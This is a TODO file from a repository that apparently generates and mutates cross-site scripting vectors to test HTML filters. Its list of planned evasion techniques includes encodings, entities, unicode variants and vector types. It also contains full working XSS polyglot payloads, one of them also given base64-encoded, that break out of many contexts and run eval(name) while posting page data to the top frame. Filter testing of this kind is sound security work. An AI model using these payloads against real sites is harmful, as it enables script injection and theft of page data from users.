-
Notifications
You must be signed in to change notification settings - Fork 0
/
TODO
39 lines (35 loc) · 2.91 KB
/
TODO
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
* Change mutation to happen last, before emitting the vector.
** Apply mutation as object attributes/annotation on the {"tagName": ...} object to allow easier de-/serialization and mutation of once emitted vectors.
* mutate using entities and escapes where applicable
~ add random prefix/suffix to escape context (prefix is there...)
* enable testing of other restriction scenarios (elements of "this" in Worker, CSP & Iframe Sandbox, ...)
* grep for TODO/XXX comments..
~ stop testing a context/filter combination, once a bypass has been found (a bit hackish so far)
* find some use for biglist.js
html generation:
* cool vector I just thought of: -->"; alert("<script>alert(1)</script>");// (works in comment, script and pure html. not in any tag or style though)
see also "one vector to rule them all", reworked to use our top.postMessage thing:
javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=top.postMessage([window.location.href,window.name],/\*/.source.slice(1))]<img -/style=a:expression(/*'/-/*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=top.postMessage([window.location.href,window.name],/\*/.source.slice(1)) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"
== atob("amF2YXNjcmlwdDovKi0tPl1dPiU+Pz48L3NjcmlwdD48L3RpdGxlPjwvdGV4dGFyZWE+PC9ub3NjcmlwdD48L3N0eWxlPjwveG1wPiI+W2ltZz0xLG5hbWU9dG9wLnBvc3RNZXNzYWdlKFt3aW5kb3cubG9jYXRpb24uaHJlZix3aW5kb3cubmFtZV0sL1wqLy5zb3VyY2Uuc2xpY2UoMSkpXTxpbWcgLS9zdHlsZT1hOmV4cHJlc3Npb24mIzQwJiM0NyYjNDInLy0vKiYjMzksLyoqL2V2YWwobmFtZSkvKiUyQS8vLyovLy8mIzQxOzt3aWR0aDoxMDAlO2hlaWdodDoxMDAlO3Bvc2l0aW9uOmFic29sdXRlOy1tcy1iZWhhdmlvcjp1cmwoI2RlZmF1bHQjdGltZTIpIG5hbWU9dG9wLnBvc3RNZXNzYWdlKFt3aW5kb3cubG9jYXRpb24uaHJlZix3aW5kb3cubmFtZV0sL1wqLy5zb3VyY2Uuc2xpY2UoMSkpIG9uZXJyb3I9ZXZhbChuYW1lKSBzcmM9MSBhdXRvZm9jdXMgb25mb2N1cz1ldmFsKG5hbWUpIG9uY2xpY2s9ZXZhbChuYW1lKSBvbm1vdXNlb3Zlcj1ldmFsKG5hbWUpIG9uYmVnaW49ZXZhbChuYW1lKSBiYWNrZ3JvdW5kPWphdmFzY3JpcHQ6ZXZhbChuYW1lKS8vPiI=");
* see http://htmlpurifier.org/live/smoketests/xssAttacks.php
* mutation
** entities, and named entities for slash, parenthesis, tab, newline, .. / 	 

** percent-encoding for URLs, i.e. href and src.
** CSS entities in style attributes or style tags.
** backticks for attributes
** high-value unicode pendants to the low-value chars (not only whitespaces, but also alphanumeric and basic stuff)
** mix-in known goods
*** "<!-->" as prefix, CDATA shenanigans
** do \x encoding in JS if char < FF. otherwise retain \u
** capitalization
** random crap before tag closing
* make template.php interchangable with data URIs as iframe src
** generating attack vectors
** add jar-protocol
** formaction
** xlink:href
** form&action=xss
** isindex
** meta refresh
** expression in style(?)
** scheme-relative urls